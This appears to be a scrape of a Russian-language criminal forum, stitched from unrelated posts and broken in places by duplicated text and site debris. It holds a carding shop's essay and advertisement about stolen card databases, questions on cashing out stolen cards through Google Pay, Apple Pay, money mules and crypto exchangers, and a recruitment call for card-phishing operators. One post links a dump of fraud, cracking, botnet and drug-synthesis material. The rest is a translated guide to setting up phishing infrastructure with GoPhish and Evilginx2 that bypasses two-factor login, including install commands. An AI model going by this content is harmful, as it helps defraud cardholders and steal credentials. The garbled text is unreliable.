Все покупатели баз оптом, преследуют лишь одну цель, профит, и далеко не всегда обладают достаточным опытом работы с материалом. Они могут приобрести базу, прочекать ее и выставить на продажу в магазины, не осознавая всех тонкостей работы с материалом. И да, на этом уровне тоже базы могут быть перечеканы полностью , могут улететь в разные шопы, и так далее
Таким образом получается уже двойной риск, риск что добытчик работает нечестно и к примеру продал в несколько рук, или перечекал всю базу и риск того что вторые руки ( перекупы) сделали то же самое…
Важно отметить, базы всё ещё будут с высоким валидом, очень недолго но валидность будет.
3. Поставщики, перепродающие материал третий-пятый раз:
Откровенный хаос: перепродажа мата с валидом 5%
Третья часть статьи раскрывает крайнюю степень хаоса в цепочке поставок материала CC. Часто мы сталкиваемся с объявлениями или спам-рассылками от команд, предлагающих скуп материала с валидностью от 3% (Просто посмотрите форумы, Обратите внимание на спам в жабе в телеге). Эти команды покупают огромные базы такого материала, перечекивают их и выставляют в шопы, как правило сразу в несколько шопов . Все те базы которые скупают такие команды, они уже прошли первый и второй уровень как описано выше, иногда по несколько раз.
Игнорирование качества в угоду количеству...
С учетом предыдущих этапов цепочки поставок, мы можем только представить, в каком состоянии находится этот материал до того, как его перечекивают и выставляют на продажу. Важно отметить, что такой материал часто приобретают в огромных количествах, базы по несколько сотен тысяч СС перечекиваются и выставляются опять в шопы.
Интересный факт, большую часть этого рынка держат китайцы, у них на спец ресурсах встретить объявление "покупаем материал из третьих-пятых рук" - вполне нормально. Весь этот хаос распространяется по всем шопам и естественно в большинстве случаев чекер будет показывать валид и возврата вам шоп не сделает.
Итог вышесказанного, давно прошли те времена когда валидность материала можно определить только чекером.
Поехали дальше
4. Шопы…
Часто можно увидеть баннеры или рекламу шопов которые говорят что “у нас миллионы cvv, каждый день пополняем на 100k…”
Какого х**? Я не хочу сказать что прямо весь материал там как в третьем пункте нашей статьи, но его больше чем 90%.
А это значит что найти среди этого всего хороший настоящему хороший материал из первых рук практически нереально.
Учитывая цены на рекламу, на разработку, на поддержание жизнедеятельности шопа не сложно догадаться что администрация часто закрывает глаза на то что материал из пятых рук, главное чтобы показывал Чекер что это valid… Я даже больше скажу, я не буду конкретизировать но я точно знаю что некоторые админы шопов сливают мат в другие шопы, то есть опять материал ходит по кругу и естественно он перечекивается по несколько раз.
Можно просто чуть-чуть посчитать… Предположим добытчик добывает 200 карт в день, Чтоб говорит что у них каждый день 40k карт добавляется (Я даже не буду упоминать те шопы в которых каждый день якобы по 200k пополнение), Получается 200 селлеров по 200 CC в день (При этом 200 СС в день далеко не каждый может добыть, как правило это в месяц 200-300). Да я согласен с тем что есть люди которые добывают намного больше каждый день но это скорее исключение. 200 селлеров? Да-да, из моей практики, я могу сказать в шопе где есть 200 селлеров, , 195 из них - это продавцы из третьего пункта.
Такие шопы иногда даже банят своих продавцов. Но вот интересный факт, материал этих продавцов они с продажи как правило не убирают…..
Почему шопы так поступают? Да потому что бытует мнение что чем больше материала Именно исходя из вышеописанного было принято решение вывести лимбо из паблика полностью погрузиться в Приват. закрыть регистрацию и сделать её только по инвайтам,тем лучше, тем больше продаж. Частично это правда, ведь люди приходят и ищут свои бины. Но что толку с того что они находят их, но они все перечеканные по несколько раз и побывавшие во многих руках. А ведь шопу нужно покрывать издержки и ещё заработать.. Вот и получает после всего этого покупатель CC, материал с которого вбить могла бы только Ванга, ну или Копперфильд. Это ещё не говоря о тех пидатых кардерах которые сначала покупают, потом чекают в шопе, потом чекают ещё где-то, потом идут вбивать и потом пишут в тикеты "верните мне деньги за хувый мат". Так что все эти сказки про то что "кардинг мёртв" или "уже не даёт как раньше" это всё просто незнание происходящих процессов.
Исходя из вышеописанного было принято решение вывести лимбо из паблика и полностью погрузить в приват. С Нового года регистрация будет доступна только по инвайтам. Непонятные сэллеры не допускаются к продаже. Продавцы будут проверяться выборочно, вбивая их материал руками а не чекерами, если материал не будет соответствовать качеству селеры будут улетать в баню а их мат в мусорку.
Да, материала будет намного меньше и его уже намного меньше, потому что последние две недели мы жёстко чистим сэллеров. Но лучше меньше СС большего качества, чем заявленные миллионы карт в других шопах которые перечеканы и побывали в нескольких руках.
Всем удачи и профита
Какие есть варанты скэшить СА карты? есть тонна карт валид , слышал можно вбить в пейпал, поделитесь опытом
Всех приветствую , завалялся приватный мануал по Enroll 2022 года , решил выложить в паблик , не знаю кто-то выкладывал или нет.
](https://anonfiles.com/Wfu2T0W8yd/enroll_guide_zip)
anonfiles.com
Набор из всякого) че то старое че то не очень. Короче смотрите может найдете полезное что то
TOPICS:
- BOTNET STUFF (BOTNETS, CRYPTERS, RATS, RESOURCES FOR LEARNING)
- CARDING (2 CARDING CLASSES, MANY CARDING TUTORIALS, CARDING TOOLS)
- ATM HACKING
- COOKIES GUIDE (IMPORT AND LOGIN WITH THEM)
- ACCOUNT CRACKING COURSE
- ANDROID HACKING COURSE
- CARDING FULL COURSE
- SPAMMING FULL COURSE
- MOBILE SECURITY & NETWORK HACKING COURSE
- SS7 HACKING & EXPLOITATION COURSE
- CRACKING BIBLE & CONFIGS + CRACKING GUIDES AND TOOLS
- FRAUD BIBLES 2021
- CHECKERS & VALIDATORS (CHASE, SUPREME VALIDATOR, AMAZON CHECKER, BOUNCE
EMAIL, SMTP CRACKER, BILLANATOR FUCKED, YAHOO CHECKER, xMARVEL TOOLS, APPLE,
PAYPAL NUMIFY etc.)
- LETTER + LETTER MAKING TOOL
- SCAMPAGES (MORE THAN 1000)
- FRAUD METHODS (ACH TUTS, MD, REFUNDING, CARDING, BOTNET, BILLPAY AND MANY
MORE)
- PAYPAL BYPASS, ALL ABOUT ATMS, 3D SMS BYPASS
- DATING QUESTIONS AND ANSWERS, SUGAR DADDY
- SSN TEMPLATE, SPAMMING PACK
- SMS AND EMAIL SENDERS
- HACKING STUFF (PENTEST, PROGRAMMING, SCRIPTING, SECURITY, SS7, HOW TO SETUP
SMTP SERVER, HACKING SCRIPTS)
- LARAVEL TOOLS (SHELLS, EXPLOIT TOOLS, CONFIG GRABBER, DORKER, SYMLINKER,
WHMCS KILLER, FOX WSO, IP TOOLS, LARAVEL MONSTER CLEANED, JEX, FLASH X
CLEANED, V10 SUPER SAIYAJIN, SYMLINKER V2 CLEANER, SMTP CRACKER....)
- RANDOM TOOLS (ENCODER PHP, BOOT PANEL SOURCES, ADB, PYTHON SCRIPTS)
- DRUG SYNTHESES
- GERMAN FRAUD & HACKING BOOKS
Hidden content for authorized users.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/dAwWDKLS#_sJMzYUE3QXzU_ah4tsz2Q)
831 files and 73 subfolders
mega.nz
У кого имеется опыт по отработке EU 3D мата в связке Gpay/Apay, в особенности работа по Германии, был бы благодарен обратной связи.
Имеется траф 3д + OTP. Прямо сейчас я не могу сделать тесты сам, т.к мой проект находится на стадии разработки. Я собираюсь идти следующим путем: верефаю крипто провайдера на дропа. Вяжу акк провайдера в обменки без KYC, беру крипту с Gpay, эмулятор Ldplayer. Интересуют подводные камни при такой реализации и при возможности ваши советы куда копать.
Вопросы:
1. Получится ли вязать CC в Gpay на эмуляторе LDplayer и делать покупки с эмулятора? Заметил, что бьют с айфонов, возможно имеются проблемы при отработке с Gpay и Apay лезет лучше, не понятно.
2. Имеет ли смсл заморачиваться с мерчем на дропа или это будет пустой тратой времени т.к мерчи будут быстро блокать, а прогревы их будут занимать недели. Или лучше копать в сторону отработки крипты (биржи/обменки), что на первый взгляд выглядит довольно просто. Верефнув одного крипто провайдера, обменки дают лимит в 15-17к еу при покупки с gpay/apay, что выглядит сомнительно. Даже если дроп пройдет фулл вереф на аке крипто провайдера, думаю, наверняка возможны холды при таких транзакциях, не смотря на то, что сервис пишет, что я могу купить крипту в лимит 15к-17к еу при наличии верефа у провайдера. Глядя на то, как некоторые вбивалы ищут дропов для покупки стафа в оффлайн шопах по NFC, в чем-то явно подъеб, они бы тогда брали крипту, если бы было так просто.
3. Т.к баланс не известен (начинаю без фиш ба, позже добавлю эту функцию) сколько попыток у меня есть на вбив с gpay/apay, перед тем как CC умрет? Предполагаю что 2-3 не удачные транзы на вбив, дальше блок.
4. Какие максимальные суммы одной транзакцией у вас удавалось снимать через gpay/apay на прямую в крипту? Сколько попыток есть, что бы с одной карты снять частями под 0 (условно, баланс 10к еу, снимая по 1-2-3к еу под 0).
Я так же рассматриваю покупку гифтов, но гифт это 500 еу, но на балансе например 5к, будет тупо убивать карту ради 1к, если можно снять больше, поэтому интересует момент попыток успешных транзакций, возможно у кого-то удавалось делать 5 или даже 10 транзакций по 500 еу.
Когда фишат сс+отп отрабатывают 24/7 материал? Ведь код отп может жить несколько минут? Как вообще работает фиш сс+отп, если пароль генерируется для определенного платежа. Ведь нельзя ввести данные карты в одну платежку, получить код, а потом совершить платеж уже в другой системе со старым кодом. Когда человек вводит свою сс, то для какого платежа ему приходит отп?
Весьма старая но безумно познавательная книга на тему СИ, какой бы род деятельности вы не вели она понадобится вам в любом случае
cc сша с балансом
ребят я к примеру принял криптовалюту на кошелек что дальше делать?
Сразу напишу, это не коммерция. Я ничего не продаю (удалили прошлую тему)
Приветствую, я занимаюсь трафиком с facebook ads.
Сейчас активно лью на СС фишинги: фейк магазины, услуги и тд.
Ищу таких же как и я: которые тоже активно льют на СС/БА фиши и хотят
обмениваться опытом
Если найдется 5-20 единомышленников - сделаю общий чат.
Пишите в PM!
Spoiler: /// En
Greetings, I am doing traffic from facebook ads.
I'm currently active in CC phishing: fake stores, services, etc.
I am looking for others like me: who are also active in CC/BA phishing and
want to share experience
If you find 5-20 like-minded people - I will make a general chat.
Write in PM!
При пентесте [специалисты "Red Team" (Атакующие)](https://payatu.com/blog/Rashid-Feroze/redteaming-from-zero-to- one-part-1) для достижения поставленных целей, моделируют реалистичные сценарии атаки, как при настоящих полевых условиях. Фишинг является одним из сценариев атаки для получения первоначального доступа.
В контексте "Red Team" (Атакующих) фишинг это действия, связанные с отправкой электронных писем из кажущихся надежными источников с целью сбора личной информации или воздействия на жертв чтобы они выполнили определенные действия в интересах атакующих.
Хотя сама концепция фишинга кажется относительно простой, создание фишинговой инфраструктуры и необходимого для нее инструментария/фреймворка обычно само по себе является утомительной и трудоемкой задачей. В результате человек, проводящий фишинговую атаку, оказывается занят скорее настройкой фишинговой инфраструктуры и конфигурацией того, что требуется для проведения атаки, чем самой атакой.
Эта статья посвящена тому, как упростить сценарий атаки "Red Team" (Атакующих) фишинга и обеспечить последовательную и предсказуемую среду для проведения фишинговых атак.
Фишинг может осуществляться с помощью различных средств связи, таких как электронная почта, мессенджеры, текстовые сообщения и т.д. Обычно в сценарии "Red Team" (Атакующих) фишинг осуществляется через электронную почту, поскольку это относительно формальный способ коммуникации, который лучше всего подходит для типичной корпоративной среды. Конечная цель похитить конфиденциальную информацию или доставить жертве вредоносное ПО. Но в этой статье мы сосредоточимся на первом варианте, т.е. на сборе учетных данных.
Ниже перечислены основные компоненты успешной фишинговой атаки:
В контексте "Как" необходимо обсудить "Что" и "Почему".
Первый ключевой шаг разработка предлога для успешной атаки. Предлог это выдуманная история, используемая социальными инженерами для того, чтобы убедить жертву предоставить конфиденциальную информацию или совершить преступное действие.
В сценарии "Red Team" (Атакующих) фишинговая атака использует любопытство или страх жертвы, чтобы побудить ее действовать по сценарию/указаниям атакующих, несмотря на ее здравый смысл. Популярными механизмами являются заявки на работу, обновление медицинских контрактов, счета или запросы в отдел кадров, в зависимости от организации и конкретных сотрудников, затем следует ссылка, направляющая жертву на страницу входа для сбора учетных данных. Некоторые идеи по предлогам можно найти здесь.
Домен это сердце фишинговой атаки. Он является воротами жертвы к проблемам и воротами "Red Team" (Атакующих) во внутреннюю сеть организации. Выбор доменного имени для фишинговой атаки во многом зависит от характера предлога.
Типичным случаем сбора учетных данных является имитация страницы входа в реальное веб-приложение, что требует использования доменного имени, внешне близкого к оригинальному.
Для получения заманчивого доменного имени можно использовать такие приемы, как домены "typosquat" (Тайпсквоттинг - регистрация доменных имён, близких по написанию, например, "wwwsite.example" в расчёте на пользователя, который хотел попасть на "www.site.example"), необычные домены (".site", "walm.art"), домены с истекшим сроком действия, легитимные домены, которые были взломаны, и т.д. Общее правило избегать получения гомоглифных доменных имен (содержащих специальные символы, например, "éxámple.org", "ḛxamƿle.org").
Для процесса настройки шаблонов и полноценной атаки с нуля Gophish как фреймворк является лучшим решением с открытым исходным кодом. Он необходим для проведения атаки, поскольку в противном случае аналитик может запутаться в отслеживании адресов электронной почты жертв, шаблонов писем и расписаниях атак.
Ниже перечислены некоторые компоненты Gophish и их применение
В связи с широким распространением методов двухфакторной аутентификации (2FA) большинство считает, что быть обманутым уже невозможно. Это мнение подкрепляется тем, что все больше сайтов по умолчанию используют протокол HTTPS.
Evilginx это механизм атаки "человек посередине", используемый для подбора учетных данных для входа в систему вместе с сессионными cookie файлами, что, в свою очередь, позволяет обойти защиту от двухфакторной аутентификации.
При каждом успешном входе на сайт генерируется токен аутентификации для данной сессии, который включается в каждый запрос, отправляемый пользователем на сайт (cookie).
Evilginx2 ворует токены аутентификации, передаваемые в виде cookies, что позволяет ему обходить логин/пасс и двухфакторную аутентификацию. По сути, он дублирует сессию. При этом злоумышленник воспринимается как полностью успешно вошедший в систему пользователь с установленными cookies и токеном(ами).
Заслуживающим упоминания, является Phishlet.
Phishlet это своего рода строительные блоки Evilginx. Конфигурационные файлы в формате YAML для проксирования (перенаправления/копирования) легитимного веб- приложения в фишинговое.
В этих файлах указываются поддомены, которые необходимо фишировать, изменения веб-страницы в реальном времени, время и тип перехватываемых cookies, URL страницы входа и т.д.
Написание собственного Phishlet применяется в случае когда вы имеете дело с не очень популярным веб-приложением. Как создать свой собственный Phishlet, можно узнать [тут](https://mrturvey.co.uk/aiovg_videos/creating-custom-phishlets- for-evilginx2-2fa-bypass/).
Для отправки писем GoPhish требуется SMTP сервер. Лучше не создавать свой SMTP сервер с нуля, так как в индустрии маркетинга электронной почты идет жесткая конкуренция за повышение репутации SMTP серверов.
Это, в свою очередь, гарантирует, что их письма будут доставлены во входящие и не будут помещены в папку спам. Вероятность, что письма будут помечены как спам для недавно настроенного SMTP сервера, близка к очевидной.
На рынке существует множество решений для массовых рассылок, таких как AWS SES, Mailgun, Office 365. Они хорошо известны и имеют репутацию.
Очень важно, чтобы метаданные всей инфраструктуры всегда оставались скрытыми. Сюда входят IP адреса, имена поставщиков услуг и т.д. Кроме того, необходимо предусмотреть возможность реализации условной маршрутизации трафика и правил межсетевого экрана для борьбы с ботами и поисковыми роботами.
Все это должно быть сделано на физически отдельном от остальной инфраструктуры месте. Все это можно легко реализовать с помощью обычного реверс прокси, но есть более эффективное и удобное решение, не требующее больших затрат, Cloudflare.
Использование Cloudflare для управления фишинговым доменным именем имеет бесчисленное множество преимуществ, среди которых SSL-сертификаты, защита от DDoS, правила WAF, капча, реверс прокси, CDN и т.д.
Среди перечисленных выше компонентов некоторые являются SaaS (которые можно арендовать), а другие с открытым исходным кодом и требуют самостоятельного размещения. В случае использования GoPhish и Evilginx2 в состав инфраструктуры необходимо включить и VPS. Наиболее популярными вариантами являются AWS EC2, DigitalOcean Droplets и т.д.
На этом "Что" и "Зачем", составляющие базовую инфраструктуру фишинга, завершены.
Может показаться, что настраивать все это вручную большая работа. Учитывая, насколько субъективными и динамичными могут быть фишинговые атаки, автоматизировать настройку всех компонентов также нелегко, так как потребуется принять во внимание множество переменных.
Прежде чем перечислять в этой статье, что включено в автоматизацию, а что нет, необходимо ознакомиться с проблемами и вопросами, с которыми столкнулись специалисты Payatu на начальном этапе, а также с тем, что именно означает " Легкая Настройка Фишинговой Инфраструктуры".
При настройке GoPhish и Evilginx2 возникает множество сложностей. Оба они
имеют открытый код, написаны на языке Golang и требуют компиляции. Именно этот
факт может привести к большому разочарованию.
Например, при компиляции этих проектов могут возникнуть конфликты зависимостей
из-за ошибочного коммита, для исправления которого потребуется много ручной
проверки кодовой базы. Нет абсолютно никакой предсказуемости успешной
компиляции кода каждый раз, когда необходимо организовать фишинговую атаку.
Даже если не унывать, компиляция и настройка занимают значительное время. Обе
эти проблемы можно устранить, создав для этих проектов образы docker.
Подробнее о Docker и контейнеризации читайте
тут.
Другая задача состоит в том, чтобы заставить GoPhish и Evilginx2 одновременно работать на одном сервере. Оба требуют порты 80 и 443 и поэтому не могут сосуществовать без обратного прокси, например [NGiNX](mailto:~/ XSS.is Лента Пользователи FAQ Реклама Гарант IvanVasilyevich Поиск CheckZilla [ $1 = Runtime + Scantime | 20 AV ] Обработка SEED фраз, логов и Privat key AudiA6: Миксер + Обменник Underground СИ / Фишинг / APT / Мошенничество Создать тему Мануал/Книга Легкая Настройка Инфраструктуры Для Фишинга (Для SOC Аналитиков & Red Teamers) Обсуждение Вопрос Опрос img_01.cleaned.png Введение При пентесте специалисты %22Red Team%22 (Атакующие) для достижения поставленных целей, моделируют реалистичные сценарии атаки, как при настоящих полевых условиях. Фишинг является одним из сценариев атаки для получения первоначального доступа. В контексте %22Red Team%22 (Атакующих) фишинг это действия, связанные с отправкой электронных писем из кажущихся надежными источников с целью сбора личной информации или воздействия на жертв чтобы они выполнили определенные действия в интересах атакующих. Хотя сама концепция фишинга кажется относительно простой, создание фишинговой инфраструктуры и необходимого для нее инструментария/фреймворка обычно само по себе является утомительной и трудоемкой задачей. В результате человек, проводящий фишинговую атаку, оказывается занят скорее настройкой фишинговой инфраструктуры и конфигурацией того, что требуется для проведения атаки, чем самой атакой. Эта статья посвящена тому, как упростить сценарий атаки %22Red Team%22 (Атакующих) фишинга и обеспечить последовательную и предсказуемую среду для проведения фишинговых атак. Что необходимо для проведения успешной фишинговой атаки? Фишинг может осуществляться с помощью различных средств связи, таких как электронная почта, мессенджеры, текстовые сообщения и т.д. Обычно в сценарии %22Red Team%22 (Атакующих) фишинг осуществляется через электронную почту, поскольку это относительно формальный способ коммуникации, который лучше всего подходит для типичной корпоративной среды. Конечная цель похитить конфиденциальную информацию или доставить жертве вредоносное ПО. Но в этой статье мы сосредоточимся на первом варианте, т.е. на сборе учетных данных. img_02.cleaned.png Ниже перечислены основные компоненты успешной фишинговой атаки: Предлог Доменное имя Программная платформа для атак Фреймворк для фишинга Сервис рассылки писем Реверс прокси ВПС В контексте %22Как%22 необходимо обсудить %22Что%22 и %22Почему%22. 1. Предлог Первый ключевой шаг разработка предлога для успешной атаки. Предлог это выдуманная история, используемая социальными инженерами для того, чтобы убедить жертву предоставить конфиденциальную информацию или совершить преступное действие. В сценарии %22Red Team%22 (Атакующих) фишинговая атака использует любопытство или страх жертвы, чтобы побудить ее действовать по сценарию/указаниям атакующих, несмотря на ее здравый смысл. Популярными механизмами являются заявки на работу, обновление медицинских контрактов, счета или запросы в отдел кадров, в зависимости от организации и конкретных сотрудников, затем следует ссылка, направляющая жертву на страницу входа для сбора учетных данных. Некоторые идеи по предлогам можно найти здесь. 2. Доменное имя Домен это сердце фишинговой атаки. Он является воротами жертвы к проблемам и воротами %22Red Team%22 (Атакующих) во внутреннюю сеть организации. Выбор доменного имени для фишинговой атаки во многом зависит от характера предлога. Типичным случаем сбора учетных данных является имитация страницы входа в реальное веб-приложение, что требует использования доменного имени, внешне близкого к оригинальному. Для получения заманчивого доменного имени можно использовать такие приемы, как домены %22typosquat%22 (Тайпсквоттинг - регистрация доменных имён, близких по написанию, например, %22wwwsite.example%22 в расчёте на пользователя, который хотел попасть на %22www.site.example%22), необычные домены (%22.site%22, %22walm.art%22), домены с истекшим сроком действия, легитимные домены, которые были взломаны, и т.д. Общее правило избегать получения гомоглифных доменных имен (содержащих специальные символы, например, %22éxámple.org%22, %22ḛxamƿle.org%22). 3. Программная платформа для атак (фреймворк) img_03.cleaned.png Для процесса настройки шаблонов и полноценной атаки с нуля Gophish как фреймворк является лучшим решением с открытым исходным кодом. Он необходим для проведения атаки, поскольку в противном случае аналитик может запутаться в отслеживании адресов электронной почты жертв, шаблонов писем и расписаниях атак. img_04.cleaned.png Ниже перечислены некоторые компоненты Gophish и их применение Атаки: Gophish предназначен для запуска атак. Это подразумевает отправку электронных писем одной или нескольким группам и отслеживание того, какие из них были открыты, какие ссылки были нажаты и чьи данные были введены. Пользователи и группы: Gophish позволяет управлять группами пользователей, участвующих в атаке. Профили рассылки: Для отправки писем Gophish требует настройка SMTP релея, известных как %22профили отправки%22. Для этого можно использовать такие сервисы, как AWS SES, Mailgun и т.д. Шаблоны писем: Содержимое электронных писем, доставляемых на цели, называется %22шаблоном%22. Шаблоны могут быть созданы с нуля или импортированы из существующего письма. Они также позволяют отправлять вложения. Шаблоны также могут отслеживать, когда человек просматривает письмо. Лендинги (целевые страницы): После получения письма когда жертвы переходят по полученным фишинговым ссылкам, им представляются целевые HTML страницы. Шаблоны, позволяющие перехватывать учетные данные и перенаправлять пользователей на другой сайт после того, как они введут данные. Наименее интересная функциональность из-за появления многофакторной аутентификации (2FA). 4. Фреймворк для фишинга В связи с широким распространением методов двухфакторной аутентификации (2FA) большинство считает, что быть обманутым уже невозможно. Это мнение подкрепляется тем, что все больше сайтов по умолчанию используют протокол HTTPS. Evilginx это механизм атаки %22человек посередине%22, используемый для подбора учетных данных для входа в систему вместе с сессионными cookie файлами, что, в свою очередь, позволяет обойти защиту от двухфакторной аутентификации. При каждом успешном входе на сайт генерируется токен аутентификации для данной сессии, который включается в каждый запрос, отправляемый пользователем на сайт (cookie). Evilginx2 ворует токены аутентификации, передаваемые в виде cookies, что позволяет ему обходить логин/пасс и двухфакторную аутентификацию. По сути, он дублирует сессию. При этом злоумышленник воспринимается как полностью успешно вошедший в систему пользователь с установленными cookies и токеном(ами). img_05.cleaned.png Заслуживающим упоминания, является Phishlet. Phishlet это своего рода строительные блоки Evilginx. Конфигурационные файлы в формате YAML для проксирования (перенаправления/копирования) легитимного веб-приложения в фишинговое. В этих файлах указываются поддомены, которые необходимо фишировать, изменения веб-страницы в реальном времени, время и тип перехватываемых cookies, URL страницы входа и т.д. Написание собственного Phishlet применяется в случае когда вы имеете дело с не очень популярным веб-приложением. Как создать свой собственный Phishlet, можно узнать тут. 5. Сервис рассылки писем Для отправки писем GoPhish требуется SMTP сервер. Лучше не создавать свой SMTP сервер с нуля, так как в индустрии маркетинга электронной почты идет жесткая конкуренция за повышение репутации SMTP серверов. Это, в свою очередь, гарантирует, что их письма будут доставлены во входящие и не будут помещены в папку спам. Вероятность, что письма будут помечены как спам для недавно настроенного SMTP сервера, близка к очевидной. На рынке существует множество решений для массовых рассылок, таких как AWS SES, Mailgun, Office 365. Они хорошо известны и имеют репутацию. 6. Реверс прокси Очень важно, чтобы метаданные всей инфраструктуры всегда оставались скрытыми. Сюда входят IP адреса, имена поставщиков услуг и т.д. Кроме того, необходимо предусмотреть возможность реализации условной маршрутизации трафика и правил межсетевого экрана для борьбы с ботами и поисковыми роботами. Все это должно быть сделано на физически отдельном от остальной инфраструктуры месте. Все это можно легко реализовать с помощью обычного реверс прокси, но есть более эффективное и удобное решение, не требующее больших затрат, Cloudflare. Использование Cloudflare для управления фишинговым доменным именем имеет бесчисленное множество преимуществ, среди которых SSL-сертификаты, защита от DDoS, правила WAF, капча, реверс прокси, CDN и т.д. 7. ВПН (Виртуальный частный сервер) Среди перечисленных выше компонентов некоторые являются SaaS (которые можно арендовать), а другие с открытым исходным кодом и требуют самостоятельного размещения. В случае использования GoPhish и Evilginx2 в состав инфраструктуры необходимо включить и VPS. Наиболее популярными вариантами являются AWS EC2, DigitalOcean Droplets и т.д. Простой способ настройки фишинговой инфраструктуры На этом %22Что%22 и %22Зачем%22, составляющие базовую инфраструктуру фишинга, завершены. Может показаться, что настраивать все это вручную большая работа. Учитывая, насколько субъективными и динамичными могут быть фишинговые атаки, автоматизировать настройку всех компонентов также нелегко, так как потребуется принять во внимание множество переменных. Прежде чем перечислять в этой статье, что включено в автоматизацию, а что нет, необходимо ознакомиться с проблемами и вопросами, с которыми столкнулись специалисты Payatu на начальном этапе, а также с тем, что именно означает %22Легкая Настройка Фишинговой Инфраструктуры%22. Описание задач и возможных трудностей 1) При настройке GoPhish и Evilginx2 возникает множество сложностей. Оба они имеют открытый код, написаны на языке Golang и требуют компиляции. Именно этот факт может привести к большому разочарованию. Например, при компиляции этих проектов могут возникнуть конфликты зависимостей из-за ошибочного коммита, для исправления которого потребуется много ручной проверки кодовой базы. Нет абсолютно никакой предсказуемости успешной компиляции кода каждый раз, когда необходимо организовать фишинговую атаку. Даже если не унывать, компиляция и настройка занимают значительное время. Обе эти проблемы можно устранить, создав для этих проектов образы docker. Подробнее о Docker и контейнеризации читайте тут. 2) Другая задача состоит в том, чтобы заставить GoPhish и Evilginx2 одновременно работать на одном сервере. Оба требуют порты 80 и 443 и поэтому не могут сосуществовать без обратного прокси, например NGiNX. Он может прослушивать 80/tcp или 443/tcp и исходя из поддомена, направлять трафик либо на контейнер Evilginx2, либо на контейнер GoPhish. Поэтому, требуется еще один Docker контейнер NGiNX и хорошо написанный docker-compose YAML. 3) Evilginx2 по умолчанию предлагает сгенерировать SSL сертификаты от Let%27s Encrypt, и требует верификации домена. Это совершенно бесполезно, поскольку Cloudflare уже позаботился о необходимости SSL. Использование самоподписного сертификата работает просто, для них Evilginx2 должен быть запущен в режиме разработчика. 4) Осталось написать скрипт, который будет принимать данные, имя домена, поддомены, используемый phishlet и т.д., а всю магию (модификацию docker-compose.yml, генерацию самоподписного сертификата, настройку NGiNX/GoPhish/Evilginx2) выполнял бы сам. Bash в этом случае вполне подойдет. Вся эта работа уже была проделана под именем PACU, и с ней можно ознакомиться здесь. Более подробная информация о PACU, включая настройку и использование, будет представлена в ближайшее время. Опционально Хотя этот пункт является необязательным, но он интересен тем, что позволяет зафиксировать еще некоторые проблемы, с которыми пришлось столкнуться при создании PACU. Во первых, для того чтобы Evilginx2 работал за NGiNX, в конфигурационном файле NGiNX необходимо указать эти строки. Во вторых, учитывая тот факт, что все три контейнера находятся в частной сети и для Evilginx2 трафик идет с частного IPv4, назначенного NGiNX, Evilginx2 никогда не узнает реальный публичный IPv4-адрес жертвы, посетившей фишлет, а будет регистрировать частный IPv4-адрес контейнера NGiNX для каждого запроса. Это было исправлено путем внесения небольшого изменения в код Evilginx2, чтобы вместо него использовалось значение X-Real-IP, которое является http заголовком, используемым NGiNX для получения реального IP клиента. Но даже в этом случае IP адрес, который получит Evilginx2, будет принадлежать Cloudflare. Для того чтобы NGiNX мог получить доступ к IP жертвы, общающейся с инфраструктурой Cloudflare, в конфигурационный файл NGiNX была внесена еще одна модификация, устанавливающая заголовок X-Real-IP в качестве значения заголовка CF-Connecting-IP, который он получает от Cloudflare. Это значение представляет собой реальный публичный IP посетителя. К этому моменту стало ясно, что при установке и настройке Evilginx2 и GoPhish для типичной фишинговой атаки действительно существует множество проблем, и то что они уже устранены (теоретически должны быть до сих пор устранены) с помощью PACU, включая автоматическую подготовку с помощью Docker, docker-compose и простого скрипта, который еще предстоит продемонстрировать. И последнее... PACU автоматизирует установку и настройку только двух из уже рассмотренных компонентов, GoPhish (Фреймворк для атак) и Evilginx2 (Фреймворк для фишинга). Как уже говорилось выше, это единственные два компонента, которые должны быть размещены самостоятельно, и с ними связано наибольшее количество сложностей и проблем. Хотя интеграция других компонентов, таких как Cloudflare, AWS, MailGun, возможна, т.к. это управляемые сервисы и SaaS решения (арендуемые услуги). Некоторые из них являются платными, некоторые предоставляют пробные версии, а другие предоставляют ограниченные возможности бесплатно. При интеграции нескольких таких сервисов для использования PACU потребуется точно такой же стек сервисов. Учитывая это, в PACU оставлена возможность получения реального IP посетителя с Cloudflare путем модификации конфигурационного файла NGiNX. Чтобы подытожить всю рассмотренную выше инфраструктуру фишинга, ниже приведено ее наглядное представление. Схема архитектуры img_06.cleaned.png PACU Название происходит от имени всеядной южноамериканской пресноводной рыбы серрасальмиды, родственной пиранье. Поскольку эти рыбы довольно агрессивны, название хорошо соотносится с агрессивным характером %22Red Team%22 (Атакующих) и фишинговых атак. Настройка Чтобы удобно установить и настроить PACU для Ubuntu 20.04 LTS на AWS EC2 нужна всего одна команда. Bash: curl -sSL raw.githubusercontent.com/thirdbyte/pacu/main/init.sh | bash Это вызывает сценарий init.sh, который устанавливает все зависимости, такие как docker, docker-compose, и клонирует репозиторий. Кроме того, он копирует скрипт setup.sh, в /usr/local/bin, чтобы его можно было вызвать из любого места командой pacu. Опционально Чтобы убедиться в том, что PACU можно использовать в других дистрибутивах Linux и средах, не являющихся AWS EC2, можно воспользоваться ручным способом его настройки. Предполагается, что зависимости, как docker и docker-compose, уже установлены. Bash: git clone https://github.com/thirdbyte/pacu cd pacu chmod +x *.sh ./build.sh ./setup.sh (для запуска pacu) Использование Вызов pacu из shell (терминала) приведет к следующему. Bash: Usage: pacu -d example.org -p github # Инициализация Evilginx2 pacu -d example.org -g url # Инициализация GoPhish pacu -d example.org -p github -g url # Инициализация Evilginx2 с GoPhish pacu -d example.org -p github -g url -c # Включить поддержку Cloudflare при инициализации pacu evilmux # Войти в tmux-сессию Evilginx2 pacu evilmux-print # Напечатать stdout из tmux-сессии Evilginx2 pacu nginx-juice # Напечатать juice лог из NGiNX pacu nginx-stop # Остановить NGiNX pacu nginx-start # Запуск NGiNX pacu remove # Удаление pacu Подсказка по использованию не требует пояснений. -d используется для указания доменного имени, которое будет использоваться в атаке. -p имя phishlet без расширения .yaml. Эти фишлеты располагаются по адресу /opt/pacu/evilginx/phishlets/. Таким образом, если необходимо использовать github.yaml, то в полной команде будет -p github. -g используется для определения поддомена, на который будет указывать фиш сервер GoPhish. -c без значения аргумента указывает на то, что в качестве обратного прокси в инфраструктуре используется Cloudflare, поэтому nginx-proxy должен получать реальный IP клиента из HTTP-заголовка CF-Connecting-IP от Cloudflare. Интересно отметить, что в случае отсутствия -p, Evilginx2 не будет использоваться, и 